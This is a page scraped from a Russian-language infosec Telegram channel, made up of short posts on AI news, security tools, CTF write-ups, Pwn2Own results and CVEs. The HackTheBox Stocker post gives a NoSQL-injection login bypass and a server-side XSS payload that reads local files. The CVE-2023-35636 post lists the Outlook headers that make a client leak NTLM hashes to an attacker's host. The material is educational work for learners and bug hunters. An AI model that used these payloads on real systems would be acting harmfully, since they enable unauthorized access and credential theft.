Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность
12.6K subscribers
1.82K photos
93 videos
166 files
2.87K links
Все самое полезное по инфобезу в одном канале.

Список наших каналов: https://t.me/proglibrary/9197

Для обратной связи: @proglibrary_feeedback_bot

По рекламе: @proglib_adv
РКН: https://gosuslugi.ru/snet/67ab0e2e75b36e054ef6d5bf
Download Telegram
🤖 Итоги недели в мире ИИ и обзоры новых сервисов

Мы написали статью на VC, которая основана на очередном выпуске нашей рассылки про последние новости и тенденции в мире ИИ. Залетайте и читайте!

👇Ниже — мини-подборка из статьи 👇

📰 Новости

▫️ OpenAI объявила о запуске долгожданного магазина кастомных чат-ботов.
▫️ В Пасадене (штат Калифорния) открывается первая закусочная CaliExpress by Flippy, полностью управляемая ИИ.
▫️ NVIDIA выпустила модель для распознавания речи Parakeet, которая по всем показателям превосходит OpenAI Whisper.
▫️ Использование ИИ в совместном научном проекте Microsoft и Тихоокеанской северо-западной национальной лаборатории в течение недели помогло определить новый элемент, который поможет снизить на 70% использование лития в батареях. Без ИИ такое исследование заняло бы по меньшей мере 20 лет.
▫️ Компания ByteDance выпустила новую модель MagicVideo-V2 для генерации видео.

🛠 Инструменты

◾️ Auto Wiki — генерирует вики-документацию для GitHub репозиториев.
◾️ Code to Flow — визуализирует, анализирует и объясняет код, написанный на всех популярных языках и фреймворках.
◾️ Concepto — платформа для создания прототипов веб-приложений.
◾️ Afforai — выполняет суммаризацию, перевод и поиск по множеству документов.
◾️ Corgea — исправляет уязвимые фрагменты кода.
◾️ Jan — опенсорсный оффлайновый чат-бот.
◾️ Plus AI — плагин для Google Slides: делает профессиональные презентации, персональные и командные дашборды, любые отчеты.

🤙 Сделай сам

🔸 WikiChat — опенсорсный инструмент для коррекции галлюцинаций с помощью информации из Википедии.
🔸 Подробная шпаргалка и советы по созданию продвинутых RAG.
🔸 OpenVoice — опенсорный инструмент для мгновенного клонирования голоса.

🎓 Туториалы

🔹 Туториал по работе с новым API Query Pipelines показывает примеры создания простых линейных цепочек и сложных ациклических графов из модулей LlamaIndex.
🔹 Туториал по объединению LLM с помощью mergekit детально разбирает 4 основных метода объединения моделей.

#чтопроисходит
Please open Telegram to view this post
VIEW IN TELEGRAM
Шпаргалки_цифрового_детектива_Что_и_где_искать.pdf
1 MB
🔐Шпаргалка цифрового детектива: краткий путеводитель по расположению цифровых артефактов в компьютерах и смартфонах

#forensic
Если зарегистрировать учётку на сервисе builtwith и обратить внимание на раздел relationships у запрошенного домена, то можно найти связанные домены.

Полезно будет тем багхантерам, которые рассматривают wildcard домены и большие скоупы в ходе багбаунти. Пользуйтесь 🎯

#recon #bugbounty #tips
📦 HTB: Stocker

Анализируя райтапы различных актуальных машин с Hack The Box, попалось любопытное исследование, в котором автор сначала обходит аутентификацию, а затем эксплуатирует багу «чтение произвольных файлов» через функционал генерации PDF-файла.

📌 Берите на заметку рабочие кейсы и читайте полный райтап:

1. Если заголовок Content-Type изменить с application/x-www-form-urlencoded на application/json и отправить что-то вроде:

{"username":{"$ne": "0xdf"}, "password": {"$ne":"0xdf"}}


, то получится войти в систему. Итак, пока есть хотя бы один пользователь с именем пользователя, отличным от 0xdf, и паролем, отличным от 0xdf, этот пользователь будет возвращен.

2. При нажатии «Отправить покупку» POST-запрос отправляется на /api/order с таким телом:

{"basket":[{"_id":"638f116eeb060210cbd83a91","title":"Axe","description":"It's an axe.","image":"axe.jpg","price":12,"currentStock":21,"__v":0,"amount":1}]}


Если поле title заменить на

<img src=\"x\" onerror=\"document.write('<iframe src=file:///var/www/dev/index.js width=100% height=100%></iframe>')\" /> 


, то на выходе получится Server Side XSS и возможность чтения произвольных файлов 👏

#tips #writeup #pentest #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🤔 Устали сначала собирать, а потом анализировать данные о различных CVE из NVD и других критически важных источников? Команда ProjectDiscovery позаботилась об этом и представила новый инструмент cvemap.

Он предоставляет структурированный и простой в навигации CLI к различным базам данных уязвимостей, а также позволяет выполнить:

✔️ Поиск и запрос набора данных CVE
✔️ Сопоставление CVE с Known Exploited Vulnerabilities Catalog
✔️ Сопоставление CVE и Exploit Prediction Scoring System
✔️ Сопоставление CVE и Common Platform Enumeration
✔️ Сопоставление CVE с PoC'ами на GitHub
✔️ Сопоставление CVE с Nuclei Template
✔️ Сопоставление CVE с отчетами HackerOne

go install github.com/projectdiscovery/cvemap/cmd/cvemap@latest


#news #tools #CVE
😎Мы уже рассказывали, что ошибки в бизнес-логике приложений иногда встречаются чаще, чем традиционные баги. Поэтому их надо уметь искать и эксплуатировать!

📌 Ловите теоретический и практический гайд от PortSwigger, из которого вы получите базовые навыки. Ниже — только некоторые из примеров лабораторий:

Excessive trust in client-side controls
Failing to handle unconventional input
Making flawed assumptions about user behavior
Domain-specific flaws
Providing an encryption oracle

#bugbounty #pentest #practice
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯 Подборка свежих райтапов с площадки HackTheBox:

📦 HTB Sandworm: выходим из песочницы Firejail и повышаем привилегии в Linux
📦 HTB Pilgrimage: повышаем привилегии через уязвимость в Binwalk
📦 HTB Cybermonday: эксплуатируем путаницу ключей JWT
📦 HTB Authority: повышаем привилегии в Windows через ESC1 и Pass the Cert
📦 HTB Coder: реверсим шифровальщик и применяем технику ESC5
📦 HTB Sau: раскручиваем цепочку SSRF и инъекций команд до захвата веб-сервера
📦 HTB Zipping: используем инъекцию нулевого байта в ZIP-архиве, чтобы загрузить шелл
📦 HTB Bookworm: эксплуатируем сложную XSS с байпасом CSP
🔍 Лабы по форензике: Knock Knock и Tick Tock

#writeup #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
🚗 Подведены итоги трёх дней соревнований Pwn2Own Automotive, проходивших на конференции Automotive World в Токио.

📌 На соревнованиях были продемонстрированы 49 0-day в автомобильных информационно-развлекательных платформах, ОС и устройствах зарядки электромобилей. Немного деталей об атаках, которые показали исследователи:

• Два взлома окружения на базе дистрибутива Automotive Grade Linux ($47500, $35000)
• Взлом информационно-развлекательной системы автомобиля Tesla
• Взлом модема, используемого в автомобиле Tesla
• Пять взломов информационно-развлекательной системы на базе платформы Sony XAV-AX5500
• Взлом информационно-развлекательной системы на базе платформы Pioneer DMH-WT7600NEX
• Шесть взломов информационно-развлекательной системы на базе платформы Alpine Halo9 iLX-F509
• Два взлома зарядной станции Ubiquiti Connect EV Station
• Три взлома зарядной станции Phoenix Contact CHARX SEC-3100
• Взлом зарядной станции EMPORIA EV Charger Level 2
• Четыре взлома зарядной станции JuiceBox 40 Smart EV
• Семь взломов домашней зарядной станции ChargePoint Home Flex, позволивших выполнить код на уровне прошивки устройства
• Три взлома зарядной станции Autel MaxiCharger AC Wallbox Commercial

👉 Источник

#hackevent
Please open Telegram to view this post
VIEW IN TELEGRAM
🧰 Реверс-инжиниринг китайского клона тамагочи с цветным экраном ToumaPet

Когда становишься взрослым, то просто играть в игры уже не так интересно. Зато разбираться в их устройстве довольно увлекательно, особенно если вы хакер по складу ума.

👉 Читать

#reverse
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
😂 CVE-2023-35636

Команда Varonis обнаружила новую багу в функции обмена календарями в Microsoft Outlook, при котором добавление двух заголовков в электронное письмо заставляет Outlook делиться контентом и связываться с указанной машиной, создавая возможность перехвата хэша NTLM v2.

К слову, это новый способ получения NTLM-хэшей среди двух других новых способов: с помощью Windows Performance Analyzer и проводника Windows.

Для тех, кто не знает, NTLM v2 — это криптографический протокол, используемый Windows для аутентификации пользователей на удаленных серверах. Хотя NTLM v2 является более безопасной версией оригинального NTLM, v2 все еще уязвим для атак методом брутфорса и не только.

📌 Те самые заголовки Outlook:

"Content-Class" = "Sharing"
"x-sharing-config-url" = \\(Attacker machine)\a.ics


#pentest #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
📦 Невероятно крутые и доступные в понимании (особенно если смотреть после прочтения райтапа) видеоразборы заданий с HackTheBox от архитектора лабораторий.

Вот, например, разбор SSTI в приложении на Flask, взлом PyJWT и реверс/брутфорс TOPT Browser Plugin Export.

📺 Смотреть плейлист

#ctf #pentest #practice
Please open Telegram to view this post
VIEW IN TELEGRAM
👩‍💻 Для мониторинга использования ресурсов в *nix вы скорее всего используете одну из встроенных утилит (top или htop), но мало кто знает о btop.

🛠 btop — инструмент для мониторинга ресурсов системы, который выводит статистку использования процессора, памяти, сети и дисков. Это альтернатива привычного вам инструмента с более приятным UI, поддержкой мыши, простой сортировкой/фильтрацией, кастомными настройками, возможностью отображения индикатора батареи и т. д.

👉 GutHub

#tools #linux
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
📙 Книга тайных знаний — тщательно подобранная коллекция ресурсов, руководств, шпаргалок, блогов, советов, однострочников, CLI-инструментов и многого другого для системных и сетевых администраторов, DevOps-специалистов, пентестеров и исследователей безопасности.

👉 GitHub

#cheatsheet
😳CVE-2023-5480 в деталях: история одной уязвимости в Google Chrome за 16000$

Всеволод Кокорин, исследователь безопасности в SolidLab, делится историей нахождения уязвимости и описывает технические аспекты, которые привели к её возникновению. Сама уязвимость существовала в течение длительного времени и была устранена в октябре 2023 года.

📌 Вы узнаете про Service Worker + PWA, про аспекты, связанные с Payment Request API и спецификацией JIT-installed воркеров, а также про то, как архитектурные решения в веб-приложениях могут привести к серьезным багам.

👉 Читать

#pentest #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM